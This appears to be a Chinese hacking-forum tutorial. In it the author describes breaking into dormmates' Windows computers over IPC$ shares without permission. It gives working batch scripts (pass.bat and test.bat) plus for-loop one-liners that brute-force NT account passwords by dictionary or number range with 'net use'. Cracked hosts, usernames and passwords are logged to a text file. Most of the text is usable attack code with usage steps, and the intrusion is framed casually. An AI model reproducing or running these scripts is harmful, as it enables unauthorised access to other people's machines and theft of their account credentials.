假如知道一个NT帐户与密码，就可以用

　　net use \\主机\ipc$ "密码" /user:"用户"

　　与远程主机建立连接，这是每一个黑客或是梦想成为又或是正在努力成为黑客的朋友都知道的方法，甚至连我这个连菜鸟都算不上的小鸟都知道，我也仅仅知道这一条，我就用我仅仅知道的这一条在宿舍网里进入别人的电脑，因为他们的电脑密码都为空，被他们发现了之后狠K了一顿，然后纷纷加上了密码，这下可没戏了，想去偷窥他们的密码他们又防范得紧，只得想其他办法，也许各位大虾们就会利用其他方法，诸如寻找系统之类得到管理权限，而我不行，因为我前面说过，我只会那一条，那又会有人说用软件暴力破解密码就可以了，也许不错，但首先我没有那些高深的软件也没有天赋去研究那些复杂的用法，却在无意间看DOS帮助时发现了一些命令，当真是天无绝人之路：

　　1、字典：for /f %i in (字典文件) do net use \\主机\ipc$ "%i" /user:"用户"

　　2、数字：for /l %i in (start,step,end) do net use \\主机\ipc$ "%i" /user:"用户"

　　以上可参看DOS里面for帮助，还别说，真让我给连上几台机子，可问题也随之而来，连是连上了，我仍然不知道密码，下次要用还得重新全部试过。

　　正失望，无意间又发现了一个好方法，也许是我太笨，也许你们更聪明，，说不定你们早已经发现了，不再说废话，下面就将方法全部给出，请各位大虾指正：

　　将下面文件存为pass.bat:

　　@echo off

　　echo ---------------------------------------- >>c:\pass.txt

　　echo ---------------------------------------- >>c:\pass.txt

　　date /t >>c:\pass.txt

　　time /t >>c:\pass.txt

　　echo 破解结果： >>c:\pass.txt

　　if "%6"=="1" goto shit2

　　:shit1

　　start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3

　　goto quit

　　:shit2

　　start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5

　　:quit

　　将下面文件存为test.bat:

　　net use \\%1\ipc$ %2 /user:"%3"

　　goto answer%ERRORLEVEL%

　　rem %ERRORLEVEL%表示取前一命令执行返回结果，net use成功返回0，失败返回2

　　:answer0

　　echo 远程主机："%1" >>c:\pass.txt

　　echo 用 户："%3" >>c:\pass.txt

　　echo 密 码：%2 >>c:\pass.txt

　　net use \\%1\ipc$ /delet

　　exit

　　:answer2

　　将pass.bat与test.bat存放于system32中，用法如下：

　　1、如果用字典破解：pass.bat 字典文件路径及名称 主机 用户名

　　2、如果用数字破解：pass.bat 起始数 步长 结束数 主机 用户名 1

　　密码破解出来之后，存放于c:\pass.txt文件里面。

　　另外，我做的这些只是在局域网内测试，如果远程测试，受网速限制，具体情况只能靠自己去摸索

OVER